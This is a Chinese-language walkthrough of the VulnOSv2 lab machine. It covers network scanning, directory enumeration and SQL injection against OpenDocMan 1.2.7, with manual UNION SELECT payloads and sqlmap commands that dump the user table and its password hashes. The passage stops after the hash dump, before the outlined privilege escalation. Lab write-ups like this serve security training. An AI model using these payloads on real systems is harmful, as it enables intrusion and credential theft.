VulnOSv2 write up

0x00 環境搭建
- 0x01 資訊收集
0x02 漏洞挖掘
- web思路
- 步驟一：列舉目錄+主頁挖掘
- 步驟二：OpenDocMan v1.2.7 cms利用
- 步驟三：嘗試利用賬號面ssh連接webmin
0x03 提權
- 步驟四：內核漏洞提權
0x04 總結

0x00 環境搭建

在這里插入圖片描述
VritualBox配置網路為 host-only
VMware中kali加入 host-only 為Virtual Box的網卡

開啟虛擬機報錯 usb 2.0 什么的問題
修改usb設備為1.0

在這里插入圖片描述

0x01 資訊收集

ip探測
netdiscover -i eth1 -r 192.168.56.0/24

100是網關 101 是win10 104就是靶機

埠服務識別

masscan -p 1-65535 --rate=1000 192.168.56.104

nmap -sC -sV -A -p 80,6667 192.168.56.104 -o port.txt

在這里插入圖片描述

開啟了
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))

6667/tcp open irc ngircd

OS details: Linux 3.2 - 4.9

0x02 漏洞挖掘

web思路

目錄列舉查看各個功能點原始碼
手工+ 掃描器 cms

步驟一：列舉目錄+主頁挖掘

（1）kali dirsearch dirbuster 列舉
（2）審查主頁各功能點

在這里插入圖片描述
在這里發現一處隱藏目錄 /jabcd0cs/

訪問 http://192.168.56.104/jabcd0cs/

好像存在cms
在這里插入圖片描述

步驟二：OpenDocMan v1.2.7 cms利用

（1）搜索OpenDocMan v1.2.7 cms漏洞

searchsploit OpenDocMan 1.2.7
在這里插入圖片描述
searchsploit -m 32075

拷貝到當前目錄

cat 32075.txt 查看利用方法

在這里插入圖片描述

（2）利用漏洞

exp

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

爆表名

http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()

在這里插入圖片描述

直接用sqlmap吧

爆庫名

sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbs --level 3 --batch

在這里插入圖片描述

爆表名

sqlmap -u “http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user” -p add_value --level 3 --batch -D jabcd0cs --tables

在這里插入圖片描述

爆可能存在賬號密碼的欄位名

sqlmap -u “http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user” -p add_value --level 3 --batch -D jabcd0cs -T odm_user --columns

在這里插入圖片描述

爆username和password的欄位值

sqlmap -u “http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user” -p add_value --level 3 --batch -D jabcd0cs -T odm_user -C username,password --dump

在這里插入圖片描述
webmin | b78aae356709f8c31118ea613980954b |
| guest | 084e0343a0486ff05530df6c705c8bb4 (guest)